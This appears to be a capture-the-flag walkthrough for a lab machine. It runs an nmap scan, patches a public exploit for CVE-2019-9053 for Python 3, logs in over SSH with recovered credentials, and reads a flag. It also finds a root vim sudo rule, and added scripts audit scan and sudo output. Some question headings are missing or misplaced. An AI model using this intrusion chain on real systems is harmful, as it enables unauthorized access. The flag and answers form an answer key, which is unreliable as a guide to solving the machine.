$ nmap -sC -sV 10.10.48.90
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 22:29 IST
Nmap scan report for 10.10.48.90
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.48.138
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.85 seconds
There are three open ports:

Port    Service
21      ftp
80      http
2222    ssh
Out of the three, only two are below 1000.
Answer
2
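As an added example (not part of the original writeup), the following parser reads nmap's normal output format as shown above and answers both questions programmatically: which ports are open, how many sit below a given boundary, and what service listens on the highest one. It also flags the anonymous-FTP finding from the ftp-anon script. SAMPLE_NMAP_OUTPUT is a constructed excerpt of the scan above; the function names are my own.

```python
import re

# Constructed excerpt of the nmap output shown above (most NSE script output
# trimmed); the parser skips "|" script lines anyway.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A port line looks like "21/tcp   open  ftp     vsftpd 3.0.3"; the VERSION
# column is absent when -sV cannot identify the service, so it is optional.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

def parse_open_ports(output):
    """Return one dict per port that nmap reports in state 'open'."""
    ports = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue  # header, script output, or a non-open state
        ports.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return ports

def count_below(ports, limit):
    """How many open ports have a number strictly below `limit`."""
    return sum(1 for p in ports if p["port"] < limit)

def highest_port_service(ports):
    """Service name on the highest-numbered open port, or None."""
    if not ports:
        return None
    return max(ports, key=lambda p: p["port"])["service"]

def anonymous_ftp_allowed(output):
    """True if the ftp-anon script reported that anonymous login succeeded."""
    return any("ftp-anon: Anonymous FTP login allowed" in line
               for line in output.splitlines())

if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    for p in found:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<6} {p['version']}")
    print("open ports below 1000:", count_below(found, 1000))
    print("service on highest port:", highest_port_service(found))
    print("anonymous FTP:", anonymous_ftp_allowed(SAMPLE_NMAP_OUTPUT))
```

Parsing the text rather than eyeballing it matters once a scan covers more than a handful of hosts; for anything larger, nmap's `-oX` XML output is the more robust input, but the line format above is what ends up in writeups and tickets.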
What is running on the higher port?
The highest port, 2222, has SSH running on it.
Answer
ssh
What's the CVE you're using against the application?
On the web page, in the footer section, we can find the version of the CMS.
Let's check Exploit-DB to see if there is an exploit for that version.
Answer
CVE-2019-9053
To what kind of vulnerability is the application vulnerable?
The vulnerability type is mentioned on the CVE page.
Answer
SQLi
What's the password?
Let's save the exploit to a file called exploit.py.
If you don't have termcolor, you can use the following command:
pip install termcolor
We will have to modify the exploit a bit for Python 3.
exploit.py
if not options.url:
-- print "[+] Specify an url target"
++ print("[+] Specify an url target")
-- print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
++ print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
-- print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
++ print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
-- print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
++ print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
def crack_password():
-- dict = open(wordlist)
++ dict = open(wordlist, encoding='utf-8', errors='ignore')
def beautify_print_try(value):
-- print "\033c"
++ print("\033c")
def beautify_print():
-- print "\033c"
++ print("\033c")
if options.cracking:
-- print colored "[*] Now try to crack password"
++ print colored("[*] Now try to crack password")
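Review bot: the replacement line `++ print colored("[*] Now try to crack password")` is still not valid Python 3: `print` is now a function, so the whole expression has to be its argument, i.e. `print(colored("[*] Now try to crack password"))`. As written, the interpreter raises a SyntaxError before the script runs, so none of the other conversions take effect.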
Let's try to log in through SSH with the username mitch and the password secret.
$ ssh mitch@10.10.48.90 -p 2222
The authenticity of host '[10.10.48.90]:2222 ([10.10.48.90]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.48.90]:2222' (ED25519) to the list of known hosts.
mitch@10.10.48.90's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$
Note that we had to specify port 2222 because that is the port SSH is running on for this machine.
Answer
ssh
What's the user flag?
We can stabilize the shell using the following commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo; fg
export TERM=xterm
Let's read the user flag.
mitch@Machine:~$ cat user.txt
G00d j0b, keep up!
Answer
G00d j0b, keep up!
Is there any other user in the home directory? What's its name?
Let's check for other users.
mitch@Machine:~$ ls /home/
mitch sunbath
Answer
sunbath
What can you leverage to spawn a privileged shell?
We can check which commands mitch is allowed to run with sudo using the following command:
mitch@Machine:~$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
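A rule like `(root) NOPASSWD: /usr/bin/vim` is what a sudoers audit should catch before an attacker does: an interactive editor running as root gives the caller a root shell. As an added example (not the writeup's code), the script below parses `sudo -l` output in the format shown above and flags root rules for interactive binaries, rating NOPASSWD ones higher. SAMPLE_SUDO_L is constructed from the output above plus one benign rule; SHELL_ESCAPE_BINARIES holds only vim, the binary on this page, and is a placeholder to extend with the editors and pagers deployed on your own hosts.

```python
import re

# Constructed sample: the "sudo -l" output above, with a harmless extra rule so
# the audit has something it should *not* flag.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get update
"""

# Interactive programs that can spawn a subprocess for the caller. vim is the
# one on this page; this is a placeholder set, extend it for your environment.
SHELL_ESCAPE_BINARIES = {"/usr/bin/vim"}

# "(runas) TAG: TAG: /path/to/cmd args" - tags such as NOPASSWD: are optional.
RULE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmd>.+)$")

def parse_sudo_rules(output):
    """Return the command rules listed after the 'User ... may run' header."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags") or "")]
        cmd = m.group("cmd").strip()
        rules.append({
            "runas": m.group("runas"),
            "tags": tags,
            "command": cmd,
            "binary": cmd.split()[0],  # arguments, if any, follow the path
        })
    return rules

def audit_sudo_rules(rules):
    """Flag rules that hand an interactive, subprocess-capable binary to root."""
    findings = []
    for r in rules:
        runs_as_root = r["runas"] in ("root", "ALL")
        if runs_as_root and r["binary"] in SHELL_ESCAPE_BINARIES:
            findings.append({
                "rule": r["command"],
                "severity": "high" if "NOPASSWD" in r["tags"] else "medium",
                "reason": "interactive editor runs as root; can escape to a shell",
            })
    return findings

if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        print(f"[{f['severity']}] {f['rule']}: {f['reason']}")
```

The remediation is the same whether the rule is found by an audit or by an attacker: drop the editor from sudoers, or replace it with a non-interactive wrapper that does only the one privileged task the rule was meant to allow.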